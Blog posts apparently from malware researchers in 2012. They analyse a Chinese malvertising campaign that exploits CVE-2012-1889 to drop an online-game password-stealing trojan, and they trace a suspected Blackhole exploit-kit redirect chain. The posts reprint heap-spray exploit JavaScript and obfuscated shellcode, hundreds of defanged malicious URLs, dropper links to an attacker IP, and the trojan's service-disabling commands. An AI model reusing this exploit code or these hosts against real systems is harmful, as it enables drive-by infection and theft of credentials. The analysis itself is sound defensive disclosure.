tháng 9 2012 ~ fake

This is featured post 1 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

This is featured post 2 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

This is featured post 3 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

This is featured post 4 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

This is featured post 5 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

Thứ Bảy, 29 tháng 9, 2012

Chinese Malvertisement of OnlineGame Trojan/InfoStealer by Expoiting CVE-2012-1889 (MS-XML bugs MS12-043)

22:00

nam tóc xù

Actually I wrote this first in the pastebin yesterday during "crusading" with #MalwareMustDie friends.
Is the malvertisement of Chinese Online Game from the below host from Shanghai,China:


IP: 222.73.57.117
inetnum:        222.64.0.0 - 222.73.255.255
netname:        CHINANET-SH
descr:          CHINANET shanghai province network
descr:          China Telecom
descr:          No1,jin-rong Street
descr:          Beijing 100032
country:        CN

The domain is owned by a Chinese individual:

person:         Wu Xiao Li
address:        Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
country:        CN
phone:          +86-21-63630562
fax-no:         +86-21-63630566
e-mail:         ip-admin@mail.online.sh.cn
nic-hdl:        XI5-AP
mnt-by:         MAINT-CHINANET-SH
changed:        ip-admin@mail.online.sh.cn 20010510
source:         APNIC

My post in pastebin is here--->>[PASTEBIN] and here--->>[PASTEBIN]
A lot of questions came up, so I am writing in now. I am making this short.

I saw these infections urls during checking spams, first leads to the xop.html:

h00p://9be14ngfsd.pppdiy.com/jx/xop.html
h00p://9f515lzff3.pppdiy.com/xy/xop.html 
h00p://9kpgfwqdrj.pppdiy.com/hx/xop.html 
h00p://9mf9x3cl55.pppdiy.com/tl/xop.html 
h00p://9spxqc71fa.pppdiy.com/jy/xop.html 
h00p://s35fc3qiyl.pppdiy.com/wd/xop.html 
h00p://s3ebb5z4sk.pppdiy.com/wd/xop.html 
h00p://s52csz5u47.pppdiy.com/wd/xop.html 
h00p://s5c2ouavle.pppdiy.com/ny/xop.html 
h00p://s9inw8nkk9.pppdiy.com/yl/xop.html 
h00p://74jjdqugds.pppdiy.com/zt/xop.html 
h00p://75kay4lxj8.pppdiy.com/jy/xop.html 
h00p://67ldbpbmmj.pppdiy.com/jy/xop.html 
h00p://rq2e9k4ti8.pppdiy.com/xy/xop.html 
h00p://rre11swub9.pppdiy.com/yh/xop.html 
h00p://436p1bwt5s.pppdiy.com/wd/xop.html 
h00p://4a41nvbsst.pppdiy.com/tl/xop.html 
h00p://4bo1ocjpk9.pppdiy.com/wm/xop.html 
h00p://4eb2c9aupa.pppdiy.com/hx/xop.html 
h00p://4ekyz6afnh.pppdiy.com/jy/xop.html 
h00p://4gjoqgnvym.pppdiy.com/jy/xop.html 
h00p://4j4yxxyugh.pppdiy.com/wd/xop.html 
h00p://4s2aqluitq.pppdiy.com/yl/xop.html 
h00p://52jbsoqe53.pppdiy.com/ah/xop.html 
h00p://rkiit9hy1a.pppdiy.com/zt/xop.html 
h00p://rldq7secto.pppdiy.com/jy/xop.html 
h00p://roapzl6ao6.pppdiy.com/yl/xop.html 
h00p://rohws731yt.pppdiy.com/tl/xop.html 
h00p://3q4cnllxe2.pppdiy.com/yl/xop.html 
h00p://2e1t8v8z9v.pppdiy.com/zt/xop.html 
h00p://2kqi7tk2tx.pppdiy.com/wd/xop.html 
h00p://2nzysx8qfy.pppdiy.com/xy/xop.html 
h00p://2pg54c2ay2.pppdiy.com/ty/xop.html 
h00p://2tvypppa1t.pppdiy.com/jx/xop.html 
h00p://2zaco8gjga.pppdiy.com/xy/xop.html 
h00p://31fclefhp5.pppdiy.com/jy/xop.html 
h00p://37fs5qo4q5.pppdiy.com/jy/xop.html 
h00p://3p3sivfs1w.pppdiy.com/jy/xop.html 
h00p://rceta3uznz.pppdiy.com/xy/xop.html 
h00p://11a1tgjoav.pppdiy.com/wd/xop.html 
h00p://quyi6g8jz8.pppdiy.com/zt/xop.html 
h00p://r7ykgk31xl.pppdiy.com/ny/xop.html 
h00p://r89i2jzv72.pppdiy.com/ah/xop.html 
h00p://r8cvnadv11.pppdiy.com/jx/xop.html 
h00p://r8v7by8hl7.pppdiy.com/wm/xop.html 
h00p://r9mdp167ou.pppdiy.com/xy/xop.html 
h00p://ra5dfl2dhp.pppdiy.com/tl/xop.html 
h00p://q4u427a9d9.pppdiy.com/wl/xop.html 
h00p://qbfjz6vs2b.pppdiy.com/ty/xop.html 
h00p://qfckl9xclm.pppdiy.com/xy/xop.html 
h00p://qoxvbbwxxv.pppdiy.com/jy/xop.html 
h00p://qpm2jb8vds.pppdiy.com/xy/xop.html 
h00p://qrbvhfpnfi.pppdiy.com/my/xop.html 
h00p://qtxjsy4psn.pppdiy.com/wd/xop.html 
h00p://ppmcnqlq4b.pppdiy.com/hx/xop.html 
h00p://pnj1c3glru.pppdiy.com/wd/xop.html 
h00p://pnrks68rrs.pppdiy.com/wd/xop.html 
h00p://pn87z1eiaj.pppdiy.com/yl/xop.html 
h00p://pcsssued3v.pppdiy.com/tl/xop.html 
h00p://p2rb4o7xo3.pppdiy.com/ty/xop.html 
h00p://p444fcmod8.pppdiy.com/jy/xop.html 
h00p://oy3eewl8dj.pppdiy.com/wm/xop.html 
h00p://z1v1awk14w.pppdiy.com/zx/xop.html 
h00p://zlpr6v2wdp.pppdiy.com/wd/xop.html 
h00p://zrxodxxsdb.pppdiy.com/jy/xop.html 
h00p://x82ndlgusg.pppdiy.com/xy/xop.html 
h00p://xgbex2gqur.pppdiy.com/wd/xop.html 
h00p://xinfejn8sh.pppdiy.com/yh/xop.html 
h00p://ypqdgh1spm.pppdiy.com/zx/xop.html 
h00p://u3gltdtoo4.pppdiy.com/jy/xop.html 
h00p://vev8ncrkcm.pppdiy.com/jx/xop.html 
h00p://vlbujx6d19.pppdiy.com/xy/xop.html 
h00p://vouludav9m.pppdiy.com/wd/xop.html 
h00p://vqouin8qdg.pppdiy.com/wd/xop.html 
h00p://ssx2pc47nw.pppdiy.com/ty/xop.html 
h00p://sw29diefib.pppdiy.com/wd/xop.html 
h00p://t1zsxal6p5.pppdiy.com/ty/xop.html 
h00p://pq58ow6ydk.pppdiy.com/yl/xop.html 
h00p://rlcensq6ds.pppdiy.com/wd/xop.html 
h00p://s9ms36eb5q.pppdiy.com/ah/xop.html 
h00p://p8t89f1q3x.pppdiy.com/xy/xop.html 
h00p://pcsir3ijj9.pppdiy.com/zt/xop.html 
h00p://pjv68ibarl.pppdiy.com/ah/xop.html 
h00p://ow858ymp4d.pppdiy.com/xx/xop.html 
h00p://opu3mx9u8s.pppdiy.com/tl/xop.html 
h00p://o1v1ia7fzp.pppdiy.com/ah/xop.html 
h00p://nq9k8bhtgy.pppdiy.com/tl/xop.html 
h00p://mj3aqytgna.pppdiy.com/wd/xop.html 
h00p://mkjbyf6vr8.pppdiy.com/xy/xop.html 
h00p://lsjq1ic827.pppdiy.com/zt/xop.html 
h00p://ln9jwxhwp2.pppdiy.com/jy/xop.html 
h00p://kltudl7ixd.pppdiy.com/wd/xop.html 
h00p://kb8ngrsrkt.pppdiy.com/zx/xop.html 
h00p://jqqm6ksd4u.pppdiy.com/jx/xop.html 
h00p://joez462a36.pppdiy.com/xy/xop.html 
h00p://ir1mxyqbe1.pppdiy.com/jy/xop.html 
h00p://hrwvzspefk.pppdiy.com/my/xop.html 
h00p://hwwlnwoh5u.pppdiy.com/jx/xop.html 
h00p://hehqxbhtrr.pppdiy.com/xy/xop.html 
h00p://gzfuswbru9.pppdiy.com/xy/xop.html 
h00p://gur1nihj4g.pppdiy.com/wd/xop.html 
h00p://gcrbfl8iyi.pppdiy.com/jx/xop.html 
h00p://fs12vmyw85.pppdiy.com/wd/xop.html 
h00p://fs9kdc75dk.pppdiy.com/jy/xop.html 
h00p://dxonfcd1zh.pppdiy.com/zt/xop.html 
h00p://dfmta9juu5.pppdiy.com/ah/xop.html 
h00p://di6uj6rqk3.pppdiy.com/jy/xop.html 
h00p://85qcnilv1k.pppdiy.com/my/xop.html 
h00p://4oy56fcvmg.pppdiy.com/jy/xop.html 
h00p://x7zzmg5b1v.pppdiy.com/jx/xop.html 
h00p://zgxx2raoak.pppdiy.com/jx/xop.html 
h00p://wxf3mzd3zn.pppdiy.com/jx/xop.html 
h00p://wzrkh2m8xl.pppdiy.com/xx/xop.html 
h00p://uc18awkxod.pppdiy.com/my/xop.html 
h00p://v2229jswhx.pppdiy.com/wd/xop.html 
h00p://pxkxilbpos.pppdiy.com/wm/xop.html 
h00p://rakwmwhpve.pppdiy.com/xy/xop.html 
h00p://nsqjxjbfcs.pppdiy.com/ah/xop.html 
h00p://ny5iceirim.pppdiy.com/jx/xop.html 
h00p://iz5lh4r5qi.pppdiy.com/yl/xop.html 
h00p://4fp9g7s3tr.pppdiy.com/xy/xop.html 
h00p://57vcqwfb8a.pppdiy.com/jy/xop.html 
h00p://oqlpdxtgux.pppdiy.com/zt/xop.html 
h00p://ocd1bm7coa.pppdiy.com/xy/xop.html 
h00p://od5aaz7m5e.pppdiy.com/jx/xop.html 
h00p://odvn3j955e.pppdiy.com/zx/xop.html 
h00p://ogd48fw2lt.pppdiy.com/tl/xop.html 
h00p://oixgmmsng1.pppdiy.com/xy/xop.html 
h00p://ntuhp4ou1t.pppdiy.com/yl/xop.html 
h00p://oaicu6zotz.pppdiy.com/zt/xop.html 
h00p://oannucq891.pppdiy.com/jx/xop.html 
h00p://nmwlyg9jtd.pppdiy.com/xy/xop.html 
h00p://nf8ri2a2ah.pppdiy.com/zt/xop.html 
h00p://myx7rlgfgz.pppdiy.com/yl/xop.html 
h00p://mzjqths79w.pppdiy.com/yl/xop.html 
h00p://n19yfqnfgx.pppdiy.com/jy/xop.html 
h00p://n318aq72eb.pppdiy.com/jy/xop.html 
h00p://n3zxb481z3.pppdiy.com/yh/xop.html 
h00p://n8dx15kr7y.pppdiy.com/xy/xop.html 
h00p://muy6w1ufrw.pppdiy.com/jx/xop.html 
h00p://mvhnrd8c9o.pppdiy.com/jy/xop.html 
h00p://mvzn8qs8lg.pppdiy.com/wd/xop.html 
h00p://mu5dptjoda.pppdiy.com/xy/xop.html 
h00p://msogw56yis.pppdiy.com/xy/xop.html

And the others leads to index.html...

h00p://yzua8al89b.pppdiy.com/wd/index.html 
h00p://wjjxh168lj.pppdiy.com/wd/index.html 
h00p://ki9hfgy8eb.pppdiy.com/wd/index.hmlt 
h00p://9fnq4ekiqd.pppdiy.com/wd/index.html 
h00p://agz5utxh9u.pppdiy.com/wd/index.html 
h00p://nkkprh379v.pppdiy.com/wd/index.html

The index.html as per plainly written in its code, using simple unobfucated JavaScript to drop wd.exe, an online game trojan info stealer.. *)dropping code:

＜SPAN class=s1＞＜A href="h00p://222.73.57.117/exe/wd.exe"＞ﾎﾊｵﾀﾇｬﾀ､ﾍ篁ﾒ2.0-ｲｻﾊﾕｷﾑ＜/A＞＜/SPAN＞
＜SPAN class=s4＞＜SMALL＞＜FONT style="COLOR: #c7b389"＞ﾍﾆｼ・/FONT＞＜/SMALL＞＜/SPAN＞
＜SPAN class=s2＞＜font class="red"＞＜script＞sd--;document.write（sy+"-"+sm+"-"+sd）;＜/script＞＜/font＞  ＜BR＞＜FONT color=#b7b7b7＞＜script＞sh--;si--;ss--;document.write（sh+":"+si+":"+ss）;＜/script＞＜/FONT＞＜/SPAN＞
＜SPAN class=s3＞＜A href="h00p://222.73.57.117/exe/wd.exe"＞᾵ﾘﾏﾂﾔﾘ＜/A＞＜/SPAN＞
＜EM style="CLEAR: both; DISPLAY: block"＞＜/EM＞
＜P class=txt＞ﾋｵﾃ・兤 վｳ､ｶ･fﾍﾆｼﾄﾒۿ隆篁ﾒ㬺òｻｺﾃﾓﾃìﾓﾃﾁﾋｲﾅﾖʵ#｡＜/P＞

WD.EXE is a currently a well-known-detected trojan, so I am not going to disclose it further. You can check it out in Virus Total here; MD5: 8e75d7855a5ae13da08ec21d7df673e7 File size: 32.0 KB ( 32768 bytes ) File name: 8E75D7855A5AE13DA08EC21D7DF673E7.bin File type: Win32 EXE Tags: peexe upx Detection: 37 / 43 URL:------->[VIRUSTOTAL] If we take a look into the XOP.HTML, it has JavaScript to generate exploit.. I ONLY snips some important parts...starting from exploit initiation below:

heapLib.ie ＝ function（maxAlloc, heapBase） ｛
    this.maxAlloc ＝ （maxAlloc ? maxAlloc : 65535）;
    this.heapBase ＝ （heapBase ? heapBase : 0x150000）;
    this.paddingStr ＝ "AAAA";
    while （4 ＋ this.paddingStr.length*2 ＋ 2 < this.maxAlloc） ｛
        this.paddingStr ＋＝ this.paddingStr;
    ｝
    this.mem ＝ new Array（）;
    this.flushOleaut32（）;
｝

...and see the next codes after that in the pastebin here--->>[HERE]I detected CVE-2012-1889 which attacks MS-XML bugs MS12-043 seeking for execution arbitrary command. In the browser log you can see as follows:

[2012-09-30 17:46:47] [HTTP] URL: h00p://9be14ngfsd.pppdiy.com/jx/xop.html (Status: 200, Referrer: None)
[2012-09-30 17:46:48] ＜object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"＞＜/object＞
[2012-09-30 17:46:48] ActiveXObject: F6D90F11-9C73-11D3-B32E-00C04F990BB4
[2012-09-30 17:46:48] ＜meta content="IE=7" http-equiv="X-UA-Compatible"/＞

↑the object "clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" used is PoC CVE-2012-1889, which you can confirm in in securityfocus.com-->>[HERE] That CVE-2012-1889 was used to execute the evil shellcode as per generated here:

var heap_obj ＝ new heapLib.ie（0x20000）;
var sdgryyesc ＝ "%uschwmd5db%uschwmc9c9%uschwm87cd%uschwm9292%uschwm8f8f%uschwm938f%uschwm8e8a%uschwm8893%uschwm938a%uschwm8c8c%uschwm928a%uschwmc5d8%uschwm92d8%uschwmc5d7%uschwmd893%uschwmd8c5%uschwmbdbd%uschwmbdbd";
var sdgryyev ＝ （sdgryyesc.replace（/schwm/g,""））;
var fdgertrepx ＝ "%schwmuBschwmDBschwmD%uBDBschwmD%uBDBschwmD%uBDBD%uBDBschwmD%uBschwmDBD%uBDBschwmD%uBDBschwmD%uEAEA";
var fdgertrepx88 ＝ （fdgertrepx.replace（/schwm/g,""））;
var fdgertrepx99 ＝ "%u54FF%uBEA3%uBDschwmBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uschwmBDBC%u36BD%uD7schwm55%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDschwmD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%ufaE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDschwmBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7schwmB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBschwmDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7schwmBD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCBschwm42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u66schwm8E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34Bschwm5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDschwmED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDschwmB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADschwmFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u55schwm85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1Bschwm55%uBDBD%u7EBD%u1D55%uBDschwmBD%u0schwm5BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5schwm13C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CschwmC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AschwmD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD5schwm36%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8schwmED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42schwmEA%uB9schwmEB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%schwmuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61schwm36%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC93schwm6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%schwmuBE10%u8E78%uB266%uAD03%u6Bschwm87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36schwm60%u3schwm6B9%u78schwmBE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uschwmD919%u2E5schwm2%u59schwm8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uBschwm0DB%uFE42%u1103%uC066%u18schwm4D%uEF27%u1A43%u8367%u0BschwmA0%u0584%u69schwmD4%u03A6%uschwmDBC2%u411D%u8A14%u25schwm10%uschwmAschwmDB7%schwmu3D45%u12schwm6B%u4627%uA8EE";
var fdgertrepx98 ＝ （fdgertrepx99.replace（/schwm/g,""））;
var fdgertrepx123 ＝ "%u58schwmayt58%u58schwmayt58%u10schwmaytEB%u4Bschwmayt5B%uC9schwmayt33%uB9schwmayt66%u03schwmaytB8%u34schwmayt80%uBDschwmayt0B%uFAE2%u05schwmaytEB%uEBschwmaytE8%uFFschwmaytFF";
var fdgertrepx1 ＝ （fdgertrepx123.replace（/schwmayt/g,""））;
var sdfetwedvz ＝ "HJKS0c0"＋"cHJKS0c"＋"0c";
var code ＝ unescape（fdgertrepx1＋fdgertrepx98＋sdgryyev＋fdgertrepx88）;
var nops ＝ unescape（sdfetwedvz.replace（/HJKS/g,'%u'））;
while （nops.length < 0x80000） nops ＋＝ nops;
var offset ＝ nops.substring（0, 0x100）;
var shellc0de ＝ offset ＋ code ＋ nops.substring（0, 0x800-code.length-offset.length）;
while （shellc0de.length < 0x40000） shellc0de ＋＝ shellc0de;
var block ＝ shellc0de.substring（0, （0x80000-6）/2）;
heap_obj.gc（）;
for （var z＝1; z < 0x230; z＋＋） {heap_obj.alloc（block）;

Goes to this sellcode:

Can easily to be bruteforced to burp the malicious url: Some XOR efforts will lead you to strings:

h00p://[IP]/exe/[char].exe &jx

put them together to go to

h00p://222.73.57.117/exe/jx.exe

Since many asked me how I cracked this, this is a PoC snapshot:

So let's move on and grab it:

--03:01:26--  h00p://222.73.57.117/exe/jx.exe
           => `jx.exe'
Connecting to 222.73.57.117:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 48,128 (47K) [application/octet-stream]

Just to see the binary and you'll see many strange stuffs:

// Malware OP traces...

000000002FE6   0000004047E6      0   MoveFileA
000000003032   000000404832      0   WriteFile
00000000303E   00000040483E      0   CreateFileA
00000000304C   00000040484C      0   WinExec
000000003074   000000404874      0   CopyFileA

// keystroke controlling...

0000000030C0   0000004048C0      0   GetKeyboardLayoutList
0000000030D8   0000004048D8      0   GetKeyboardLayoutNameA
0000000030F2   0000004048F2      0   ActivateKeyboardLayout
00000000310C   00000040490C      0   GetKeyboardLayout
000000003120   000000404920      0   LoadKeyboardLayoutA
000000003136   000000404936      0   UnloadKeyboardLayout

// IME Traces...

IMM32.dll.ImmGetDescriptionA Hint[0]
IMM32.dll.ImmInstallIMEA Hint[0]
IMM32.dll.ImmIsIME Hint[0]

// temp OPS data

00000000380C   00000040520C      0   %c:\Recycled\%d.tmp
000000003820   000000405220      0   %c:\RECYCLER\%d.tmp

// Crypter service..
00000000E05C   00000040FA5C      0   sc delete cryptsvc
00000000E070   00000040FA70      0   sc config cryptsvc start= disabled
00000000E094   00000040FA94      0   net stop cryptsvc

//registry added traces

00000000E0A8   00000040FAA8      0   %s%s%d.dll // kbdus.dll
00000000E0DC   00000040FADC      0   SOFTWARE\kingsoft\JX3\zhcn
00000000E0F8   00000040FAF8      0   JX3Client  // JX3Client.exe
00000000E104   00000040FB04      0   Software\Microsoft\Windows\ShellNoRoam\MUICache
00000000E134   00000040FB34      0   %sdllcache\%s
00000000E144   00000040FB44      0   %syu%s     // net1.exe

The behavior check shows:

//Drops
%Appdata%\JX3Client.exe
%System%\chinasougou.ime
%System%\yumidimap.dll
%System%\net1.exe 

//Registry...(as per expected)
SOFTWARE\kingsoft\JX3\zhcn Value: "JX3Client.exe"

//Runs/control services:
net1.exe
sc.exe

//crypter service:
cryptsvc

It looks like a an online game with trojan functions, dumps your keystrokes. If you like to do online games avoid using this tools. It looks like this, found it in China sites..:

Currently Virus Total is making good detection ratio for this: MD5: bbfc347f66c1c361e7bd401f2f0d448e File size: 47.0 KB ( 48128 bytes ) File name: sample File type: Win32 EXE Tags: peexe upx mz cve-2012-1889 exploit Detection: 35 / 42 Analysis: 2012-09-29 19:16:46 UTC ( 8 時間, 20 分 ago ) URL:------->>[VIRISTOTAL] With malware names (NOTE that the original & unpacked binary has very different namings...sigh..)

First Check in VT: (PACKED/ORIGINAL BINARY)
-------------------------------------------
McAfee                   : Artemis!BBFC347F66C1
K7AntiVirus              : Riskware
TheHacker                : Posible_Worm32
F-Prot                   : W32/Heuristic-114!Eldorado
ESET-NOD32               : a variant of Win32/PSW.OnLineGames.QBF
TrendMicro-HouseCall     : TROJ_GEN.RCBCEHF
Kaspersky                : HEUR:Trojan.Win32.Generic
F-Secure                 : Dropped:Trojan.PWS.FakeIME.B
VIPRE                    : Trojan.Win32.Generic!BT
AntiVir                  : TR/ATRAPS.Gen
TrendMicro               : TROJ_GEN.RCBCEHF
McAfee-GW-Edition        : Artemis!BBFC347F66C1
Jiangmin                 : Trojan/Generic.algbo
Microsoft                : PWS:Win32/Lolyda.BF
Commtouch                : W32/Heuristic-114!Eldorado
AhnLab-V3                : Trojan/Win32.Xema
VBA32                    : TrojanPSW.QQTen.ng
PCTools                  : Trojan.Gen
Ikarus                   : Trojan-PWS.Win32.Lolyda
Fortinet                 : W32/Onlinegames.QBF!tr
AVG                      : unknown virus Win32/DH{HhM6SEVn}
Panda                    : Suspicious file

First Check in VT: (UNPACKED)
-------------------------------
F-Secure                 : Dropped:Trojan.PWS.FakeIME.B
DrWeb                    : BackDoor.PcClient.5930
GData                    : Dropped:Trojan.PWS.FakeIME.B
Symantec                 : Suspicious.Cloud.5
Norman                   : W32/OnLineGames.NVOE
ESET-NOD32               : a variant of Win32/PSW.OnLineGames.QBF
eScan                    : Dropped:Trojan.PWS.FakeIME.B
Fortinet                 : W32/Onlinegames.QBF!tr
Emsisoft                 : Trojan-PWS.Win32.Lolyda!IK
VBA32                    : TrojanPSW.QQTen.ng
Kaspersky                : HEUR:Trojan.Win32.Generic
Jiangmin                 : Trojan/Generic.algbo
Rising                   : Trojan.Win32.Fednu.uhc
Ikarus                   : Trojan-PWS.Win32.Lolyda
AntiVir                  : TR/Crypt.ZPACK.Gen
AVG                      : unknown virus Win32/DH{HhM6SEVn}
Panda                    : Suspicious file
ViRobot                  : Trojan.Win32.A.PSW-Frethoq.51200
Comodo                   : TrojWare.Win32.Poison.QBF

Thứ Bảy, 22 tháng 9, 2012

Following a lead of "Suspected" Blackhole2 - New changes in plugin detect PDF's infection method, PDF/JavaScript codes

02:19

nam tóc xù

Firstly, special thank's for the first lead to @it4sec! This post is dedicated to all #MalwareMustDie members and supporters for being solid friends!

Assuming the current target is a BlackHole v2.0 infectors online, we picked two urls from blacklist which lead to one infection. This is a story of peeling the threat. But before we continue, one more thing, this post is based on reversing we did while racing with time, sorry if you unhappy with the lack of details, please bare with it. Hope being useful. Here we go:


We got below links, which lead to the same infection case:
h00p://85.18.21.252/cKMXzC0n/index.html
h00p://85.18.21.252/SgcjN3i/index.html
(these information we picked up from blacklist, contact me for source..)
We fetched it : h00p://85.18.2１.252/cKMXzC0n/index.html
--14:18:35--  h00p://85.18.2１.252/SgcjN3i/index.html
           => `index.html'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 418 [text/html]
14:18:37 (1.51 KB/s) - `index.html' saved [418/418]
To find the below code, contains 4(four) links to js.js file... ＜html＞
＜h1＞WAIT PLEASE＜/h1＞
 ＜h3＞Loading...＜/h3＞
 ＜script type="text/javascript" src="h00p：//rolandpangrati.com/N65FCWa1/js.js"＞＜/script＞
＜script type="text/javascript" src="h00p：//grupo-amaro.com/GpuVcKtR/js.js"＞＜/script＞
＜script type="text/javascript" src="h00p：//www.laptopcolorat.com/zeScNpWp/js.js"＞＜/script＞
＜script type="text/javascript" src="h00p：//grupocitometria.org.ar/ZfHxvN8N/js.js"＞＜/script＞

＜/html＞
Those js.js files are identical one to another (diff'ed them all), And looks like the below contents...(to save space, I pasted only two) --14:19:48--  h00p：//rolandpangrati・com/N65FCWa1/js.js
           => `js.js'
Resolving rolandpangrati・com... 89.42.216.137
Connecting to rolandpangrati.com|89.42.216.137|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
14:19:49 (1.14 MB/s) - `js.js' saved [73/73]

$ cat js.js
document.location='h00p：//69.194.192.2O3/links/anybody_miss-knowing.php';

--14:22:56--  http://www.laptopcolorat.com/zeScNpWp/js.js
           => `js.js.1'
Resolving www.laptopcolorat・com... 3１.14.23.252
Connecting to www.laptopcolorat.com|31.14.23.252|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
14:22:57 (2.04 MB/s) - `js.js.1' saved [73/73]

$ cat js.js
document.location='h00p：//69.194.192.2O3/links/anybody_miss-knowing.php';
↑So this is the link of the actual landing page (anybody_miss-knowing.php) We saw the obfuscated BlackHole PluginDetect v0.7.8 code written there: ↑the upper parts was the obfuscation code following w/the decoder logic. If you deobfs it well you'll get this "neutralized" code-->>[PASTEBIN]The techniques used in the obfuscation is by hiding them behind "google" element,  using tag values to store obfuscation data: ＜u 
id="google" 
d0="&4442494b46%3d42142o3o%453j3l3q2c^3h44…
d1="3q144449&403h3r3i14$3e15251645_3q3g3h3…
d2="e2525+163i453q3f@443l3r3q16+4d1g3l432r…
    :
    :    
d93="23d1k1i(33423l443h(1c423d1m1i$423h434…
d94="423q^3r1d4b4d3g_3r3f453p3h$3q441i4742…＞
＜/u＞
↑Additional (2012 Sept 24th) log, IMPORTANT!Please be noted, for deobfuscation of the current sample - many automation scheme are failed to deobfs it correctly or hangs,  it is because the obfuscation code is having separation the JavaScript -  calls/code used, it is a simple strings trick yet works to fools some - signatures. In a similar sample we found the calls - was put in the variable like this: ＜html＞＜body＞＜sｃriｐt＞
g="getElementById";
ss=String.fromCharCode;
gg="getAttribute";＜/sｃriｐt＞
..and also there was a string manipulation to hide eval() wordings: ｛window["e"+"v"+"a"+"l"](s);｝
